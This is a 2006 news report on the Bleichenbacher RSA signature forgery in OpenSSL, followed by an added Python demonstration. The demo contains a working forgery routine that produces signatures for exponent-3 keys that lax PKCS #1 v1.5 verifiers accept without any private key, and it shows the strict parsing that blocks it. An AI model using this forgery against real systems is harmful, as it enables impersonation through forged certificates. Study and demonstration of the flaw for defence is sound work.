OpenSSL Forgery Scam Discovered

September 7, 2006 — (WEB HOST INDUSTRY REVIEW) — Security researchers have demonstrated a way to forge RSA digital signatures that the OpenSSL software used in many secure Web servers and virtual private networks will accept as valid, reports Web analytics firm Netcraft (netcraft.com). The OpenSSL Project has issued patches to address the weakness and is urging users to upgrade or apply the patches.

The signature forgery technique was first presented last month by Bell Labs cryptographer Daniel Bleichenbacher at the CRYPTO 2006 conference. It does not break RSA itself. It exploits verifiers that check signatures in the PKCS #1 v1.5 format without confirming that the padding and hash fill the entire signature block, and it is practical only against keys with a small public exponent (such as 3). Such keys are used by some certificate authorities in SSL server certificates.

“All software that uses OpenSSL to verify X.509 certificates is potentially vulnerable, as well as any other use of PKCS #1 v1.5,” OpenSSL said in its advisory. “This includes software that uses OpenSSL for SSL or TLS.” OpenSSL versions up to 0.9.7j and 0.9.8b are affected; the fix is in 0.9.7k and 0.9.8c.
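The following is an added example, not code from the article, from Netcraft or from OpenSSL. It shows the mechanism behind the advisory: a lax PKCS #1 v1.5 verifier that stops parsing once it finds a matching DigestInfo, a strict one that insists the DigestInfo fill the rest of the block, and a forgery for public exponent 3 that needs no private key at all. Because the forgery never touches the private key, the modulus is a constructed 2048-bit stand-in (assumption for the demo only; any real 2048-bit e=3 RSA modulus behaves the same way). It uses SHA-256 for the hash; the certificates of 2006 mostly used SHA-1, but the attack is identical.

```python
"""Bleichenbacher-style PKCS #1 v1.5 forgery against a lax verifier, e = 3.
Added demonstration; not the article's or OpenSSL's own code."""
import hashlib

E = 3
KEY_BITS = 2048
K = KEY_BITS // 8  # length in bytes of the signature and of the encoded block

# DER DigestInfo prefix for SHA-256: SEQUENCE { SEQUENCE { OID sha256, NULL }, OCTET STRING (32) }
SHA256_PREFIX = bytes.fromhex("3031300d060960864801650304020105000420")


def stand_in_modulus(bits=KEY_BITS):
    """Constructed stand-in for a 2048-bit RSA modulus (assumption: deterministic odd
    integer with the top bit set). It is not a product of two primes and has no private
    key; the forgery below does not need one."""
    h = b"".join(hashlib.sha256(b"openssl-2006-demo-%d" % i).digest()
                 for i in range(bits // 256))
    return int.from_bytes(h, "big") | (1 << (bits - 1)) | 1


def digest_info(msg):
    return SHA256_PREFIX + hashlib.sha256(msg).digest()


def emsa_pkcs1_v15_encode(msg, k=K):
    """Correct EMSA-PKCS1-v1_5 encoding: 00 01 FF..FF 00 DigestInfo, exactly k bytes,
    so the DigestInfo ends on the last byte of the block."""
    t = digest_info(msg)
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t


def check_block(block, msg, strict):
    """Parse the recovered block. With strict=False the verifier accepts as soon as the
    DigestInfo matches and ignores any trailing bytes, which is the class of bug the
    advisory describes. With strict=True the DigestInfo must fill the rest of the block."""
    if len(block) != K or block[:2] != b"\x00\x01":
        return False
    i = 2
    while i < len(block) and block[i] == 0xFF:
        i += 1
    if i - 2 < 8 or i >= len(block) or block[i] != 0x00:
        return False
    i += 1
    t = digest_info(msg)
    if strict:
        return block[i:] == t
    return block[i:i + len(t)] == t  # trailing bytes silently ignored


def verify(n, e, sig, msg, strict):
    m = pow(int.from_bytes(sig, "big"), e, n)
    return check_block(m.to_bytes(K, "big"), msg, strict)


def icbrt(x):
    """Floor of the integer cube root, by binary search on Python big ints."""
    lo, hi = 0, 1 << ((x.bit_length() + 2) // 3 + 1)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if mid ** 3 <= x:
            lo = mid
        else:
            hi = mid - 1
    return lo


def forge_signature(msg, k=K):
    """Forge for e = 3 without the private key. Lay out 00 01 FF*8 00 DigestInfo at the
    top of the block and let the remaining low bytes be anything; then find an integer s
    whose cube lands in that range. Since s^3 is smaller than any 2048-bit modulus,
    s^3 mod n == s^3 and the lax verifier recovers exactly this block."""
    prefix = b"\x00\x01" + b"\xff" * 8 + b"\x00" + digest_info(msg)
    garbage_bits = 8 * (k - len(prefix))
    low = int.from_bytes(prefix, "big") << garbage_bits
    s = icbrt(low)
    if s ** 3 < low:
        s += 1
    if s ** 3 >= low + (1 << garbage_bits):
        raise ValueError("cube spacing exceeds the range the garbage bytes allow")
    return s.to_bytes(k, "big")


if __name__ == "__main__":
    n, msg = stand_in_modulus(), b"CN=example.test"
    sig = forge_signature(msg)
    print("lax verifier accepts forgery:   ", verify(n, E, sig, msg, strict=False))
    print("strict verifier accepts forgery:", verify(n, E, sig, msg, strict=True))
```

The strict branch is the whole fix: after the `00` separator the DigestInfo must be the last thing in the block, so there is no room for the attacker-chosen low bytes that make a perfect cube. With a larger public exponent such as 65537 the cube-root trick does not apply, which is why the advisory's practical impact was concentrated on e=3 CA keys, but verifiers must be strict regardless of exponent.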

OpenSSL is an open source toolkit implementing the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, which many software vendors build into their security products.
